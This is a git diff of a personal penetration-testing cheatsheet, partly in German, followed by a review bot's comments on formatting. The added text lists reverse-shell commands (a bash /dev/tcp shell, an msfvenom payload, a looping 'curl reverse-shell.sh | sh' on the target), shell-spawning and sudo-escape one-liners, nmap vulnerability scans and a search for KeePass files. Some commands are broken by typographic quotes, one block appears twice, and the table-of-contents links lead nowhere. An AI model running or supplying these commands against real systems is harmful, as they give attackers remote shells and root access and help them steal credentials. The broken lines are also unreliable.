diff --git a/Cheatsheet.md b/Cheatsheet.md
index e541cda..b034611 100644
--- a/Cheatsheet.md
+++ b/Cheatsheet.md
@@ -1,200 +1,339 @@
-
-#### to install:
- - magic wormhole
- - tldr
- - rlwrap
- -
-```bash
-sudo apt update --fix-missing && sudo apt install magic-wormhole tealdeer rlwrap
-```
-#### for keyring
--> if there is some kind of keyring error
-```bash
-sudo wget https://archive.kali.org/archive-keyring.gpg -O /usr/share/keyrings/kali-archive-keyring.gpg
-```
+
+# Table of Contents
+
+1. [information gathering](#org852ec36)
+ 1. [nmap](#orgda1065c)
+ 2. [dirb](#orgafbfb19)
+2. [inital access](#orgd5250d9)
+ 1. [start listener:](#orgefad80b)
+ 2. [reverse shell bash:](#org147daab)
+ 3. [reverse shell file:](#org32886e3)
+ 4. [untested:](#org6c097fc)
+3. [privilege escalation](#org6812526)
+ 1. [always run these:](#org0b25bb0)
+ 2. [TTY Spawn Shell](#org4152682)
+ 1. [Python spawn shell](#orgf659bfd)
+ 2. [OS system spawn shell](#org76c29ea)
+ 3. [Bash spawn shell](#org80d5744)
+ 4. [Perl spawn shell](#orgd4f31f3)
+ 5. [Ruby spawn shell](#org2fe4e07)
+ 6. [Lua spawn shell](#orgce64187)
+ 7. [IRB spawn shell](#org28402e0)
+ 8. [VI spawn shell](#org6bfa44c)
+ 9. [VI(2) spawn shell](#org4241f95)
+ 10. [Nmap spawn shell](#org5dc86b6)
+4. [Windows](#orgdcc9f31)
+ 1. [WinPEAS](#org21afc9d)
+ 2. [LOLBAS](#org08b790e)
+ 3. [WADCOMS](#orgb12dcff)
+ 4. [PrivescCheck Script as an alternative to WinPEAS](#org2bed5cd)
+ 5. [RUN these while the other scripts are working](#orgea4f773)
+ 6. [for finding kbdx Files](#org0f35200)
+
+1. to install:
+
+ - magic wormhole
+ - tldr
+ - rlwrap
+ -
+
+ sudo apt update --fix-missing && sudo apt install magic-wormhole tealdeer rlwrap
+
+2. for keyring
+
+ -> if there is some kind of keyring error
+
+ sudo wget https://archive.kali.org/archive-keyring.gpg -O /usr/share/keyrings/kali-archive-keyring.gpg
+
+
+
# information gathering
+
+
+
### nmap
for quick scan of available ips
-```bash
-nmap -sn ip/24
-```
+
+ nmap -sn ip/24
+
to filter output for open ips
-```bash
-nmap -sn 192.168.1.0/24 | grep "for " | awk '{print $5}' > ips.txt
-```
+ nmap -sn 192.168.1.0/24 | grep "for " | awk '{print $5}' > ips.txt
scan open ports:
-```bash
-nmap -sCV -A -p $(nmap 192.168.1.155 -p- | grep open | awk -F '/' '{print $1}' | tr '\n' ',' | sed 's/.$//') 192.168.1.155
-```
-#### bei windows
-```bash
-nmap --vuln ip
-```
-##### bei windows \+ smb
-```bash
-nmap --script vuln-smb* ip
-nicht mehr sicher welches es war
-nmap --script smb-vuln* ip
-```
+ nmap -sCV -A -p $(nmap 192.168.1.155 -p- | grep open | awk -F '/' '{print $1}' | tr '\n' ',' | sed 's/.$//') 192.168.1.155
+
+
+
+
+### dirb
+
+ dirb http://ip
+
+1. bei windows
+
+ nmap --vuln ip
+
+ 1. bei windows \\+ smb
+
+ nmap --script smb-vuln* ip
+
+
+
# inital access
+
+
+
+
### start listener:
-```bash
-rlwrap -cAr nc -nlvp 9002
-```
+
+ rlwrap -cAr nc -nlvp 9002
+
+
+
+
### reverse shell bash:
-```bash
-/bin/bash -i >& /dev/tcp/192.168.1.157/9002 0>&1
-```
+
+ /bin/bash -i >& /dev/tcp/192.168.1.157/9002 0>&1
+
+
+
+
### reverse shell file:
-```bash
-msfvenom -p cmd/unix/reverse_python LHOST=192.168.1.157 LPORT=9002 -f raw -o rev.py
-```
+
+ msfvenom -p cmd/unix/reverse_python LHOST=192.168.1.157 LPORT=9002 -f raw -o rev.py
+
-> from revshells.com
+
+
+
### untested:
- Reverse Shell as a Service
- 1. On your machine:
-```bash
- nc -l 1337
- or nlvp?
-```
+Reverse Shell as a Service
- 2. On the target machine:
-```bash
- curl https://reverse-shell.sh/yourip:1337 | sh
-```
+1. On your machine:
+
+ nc -l 1337
+ or nlvp?
+
+1. On the target machine:
+
+ curl https://reverse-shell.sh/yourip:1337 | sh
+
+1. reconnecting:
+
+ while true; do curl https://reverse-shell.sh/yourip:1337 | sh; done
-#### reconnecting:
-```bash
-while true; do curl https://reverse-shell.sh/yourip:1337 | sh; done
-```
+
# privilege escalation
-### always run these:
-```bash
-sudo -l
-```
-if sudo doesn't work:
-[[#^78d3ce|spawn shell]]
-#### check cronjobs
-```bash
-ls /etc/cron.*
-crontab -l
-```
+
+
+
+## always run these:
+
+ sudo -l
+
+if sudo doesn’t work:
+[3.2](#org4152682)
+
+1. check cronjobs
+
+ ls /etc/cron.*
+ crontab -l
+
+
+
## TTY Spawn Shell
-##### if sudo still doesn't work
-use
-```bash
-sudo -S command
-```
+1. if sudo still doesn’t work
+
+ use
+
+ sudo -S command
+
+ Often during pen tests you may obtain a shell without having tty, yet wish to interact further with the system. Here are some commands which will allow you to spawn a tty shell. Obviously some of this will depend on the system environment and installed packages.
+
+
+
-Often during pen tests you may obtain a shell without having tty, yet wish to interact further with the system. Here are some commands which will allow you to spawn a tty shell. Obviously some of this will depend on the system environment and installed packages.
### Python spawn shell
-```bash
-python -c 'import pty; pty.spawn("/bin/bash")'
-```
+ python -c 'import pty; pty.spawn("/bin/bash")'
+
Fully Interactive TTY
-#### All the steps to stabilize your shell
-**The first step:**
+1. All the steps to stabilize your shell
-```bash
-python3 -c 'import pty;pty.spawn("/bin/bash")'
-```
+ ****The first step:****
+
+ python3 -c 'import pty;pty.spawn("/bin/bash")'
+
+ Which uses Python to spawn a better-featured bash shell. At this point, our shell will look a bit prettier, but we still won’t be able to use tab autocomplete or the arrow keys.
+
+ ****Step two is:****
+
+ export TERM=xterm
+
+ This will give us access to term commands such as clear.
+
+ ****Finally (and most importantly) we will background the shell using****
+
+ Ctrl + Z
+
+ Back in our own terminal we use
+
+ stty raw -echo; fg
+
+ This does two things: first, it turns off our own terminal echo which gives us access to tab autocompletes, the arrow keys, and Ctrl + C to kill processes
+
+ stty rows 38 columns 116
-Which uses Python to spawn a better-featured bash shell. At this point, our shell will look a bit prettier, but we still won’t be able to use tab autocomplete or the arrow keys.
-
-**Step two is:**
-```bash
-export TERM=xterm
-```
+
-This will give us access to term commands such as clear.
-
-**Finally (and most importantly) we will background the shell using**
-
-```bash
-Ctrl + Z
-```
-
-Back in our own terminal we use
-
-```bash
-stty raw -echo; fg
-```
-
-This does two things: first, it turns off our own terminal echo which gives us access to tab autocompletes, the arrow keys, and Ctrl + C to kill processes
-
-```bash
-stty rows 38 columns 116
-```
### OS system spawn shell
-```bash
-echo os.system("/bin/bash")
-```
+ echo os.system("/bin/bash")
+
+
+
+
### Bash spawn shell
-```bash
-/bin/sh -i
-```
+ /bin/sh -i
+
+
+
+
### Perl spawn shell
-```bash
-perl —e 'exec "/bin/sh";'
-```
+ perl —e 'exec "/bin/sh";'
+
+
+
+
### Ruby spawn shell
-ruby: exec "/bin/sh"
+ruby: exec “/bin/sh”
+
+
+
### Lua spawn shell
-lua: os.execute("/bin/sh")
+lua: os.execute(“/bin/sh”)
+
+
+
### IRB spawn shell
-exec "/bin/sh"
+exec “/bin/sh”
+
+
+
### VI spawn shell
-```bash
-:!bash
-```
+ :!bash
+
+
+
+
### VI(2) spawn shell
-```bash
-:set shell=/bin/bash:shell
-```
+ :set shell=/bin/bash:shell
+
+
+
+
### Nmap spawn shell
-```bash
-!sh
-```
+ !sh
-#### Exiftools
+1. Exiftools
-Metadaten auslesen:
+ Metadaten auslesen:
+
+ exiftool picture.png
+
+ Binwalk (Binary Daten exportieren):
+
+ binwalk -e picture.png
-```bash
-exiftool picture.png
-```
-Binwalk (Binary Daten exportieren):
+
+
+# Windows
+
+
+
+
+### WinPEAS
+
+
+
+
+
+
+### LOLBAS
+
+#
+
+
+
+
+### WADCOMS
+
+
+
+
+
+
+### PrivescCheck Script as an alternative to WinPEAS
+
+
+
+
+
+
+### RUN these while the other scripts are working
+
+ whoami /priv
+
+ whoami /all
+
+ schtasks /query
+
+
+
+
+### for finding kbdx Files
+
+
+
+ Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue
+
+quick Wins Linux:
+gdb -nx -ex ’!sh’ -ex quit
+sudo mysql -e ’! /bin/sh’
+strace -o /dev/null /bin/sh
+sudo awk ’BEGIN {system(“/bin/sh”)}’
+
+evilwinrm
+quick Wins Linux:
+gdb -nx -ex ’!sh’ -ex quit
+sudo mysql -e ’! /bin/sh’
+strace -o /dev/null /bin/sh
+sudo awk ’BEGIN {system(“/bin/sh”)}’
-```bash
-binwalk -e picture.png
-```
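Review bot: The typographic quotes in the added "quick Wins Linux" lines and in the Ruby, Lua and IRB spawn-shell entries (`gdb -nx -ex ’!sh’ -ex quit`, `sudo awk ’BEGIN {system(“/bin/sh”)}’`, `exec “/bin/sh”`) are not quote characters to a shell or interpreter, so these commands break when pasted. Restore ASCII `'` and `"`, and change the long dash in `perl —e` to `-e` while touching that line. The "quick Wins Linux" block is added twice, once before and once after the `evilwinrm` line, and neither copy has a heading or code formatting, so it will render as a run-on paragraph under the kdbx section. Dropping the bash fences also leaves the `nmap -sn 192.168.1.0/24 | grep ...` line and the port-scan line directly after their prose lines with no blank line in between, which Markdown treats as paragraph continuation rather than code. The new dirb section is inserted ahead of "bei windows", so `nmap --vuln ip` and `nmap --script smb-vuln* ip` now sit under dirb instead of nmap. The table of contents links to `#org...` anchors that nothing in the added body defines, and WinPEAS, LOLBAS, WADCOMS and PrivescCheck are empty headings (LOLBAS has a stray `#` line); either fill them in or leave them out of the TOC until they have content. Spelling: "inital access", and "kbdx" in the heading where the command searches `*.kdbx`.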